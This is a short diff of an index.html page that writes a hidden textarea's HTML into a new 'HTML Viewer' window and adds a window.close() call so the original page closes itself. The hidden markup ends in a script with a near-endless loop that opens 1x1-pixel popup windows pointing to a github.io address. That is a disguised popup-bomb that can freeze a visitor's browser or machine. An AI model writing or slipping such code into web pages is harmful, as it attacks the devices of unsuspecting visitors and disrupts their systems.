--- a/index.html
+++ b/index.html
@@ -1,7 +1,9 @@
 <script>window.onload = function(){
   var input = document.getElementById("html-input").value;
   var win = window.open("", "HTML Viewer");
-  win.document.write(input);}</script>
+  win.document.write(input);}
+window.close();
+</script>
   <form><textarea style="visibility: hidden;" id="html-input" rows="50%" cols="200%">
     <head>
       <link rel="icon" href="favicon.ico">
@@ -1925,4 +1927,4 @@
       subWin = new Array();
       for (i=0; i<9999999999999999999999999999999999999999999999999; i++) subWin[i] = window.open("https://scfcdv.github.io/g/", "_blank","width=1,height=1,menubar=no,status=no,scrollbars=no","sample"+i)}
       </script></textarea>
-window.close();
+
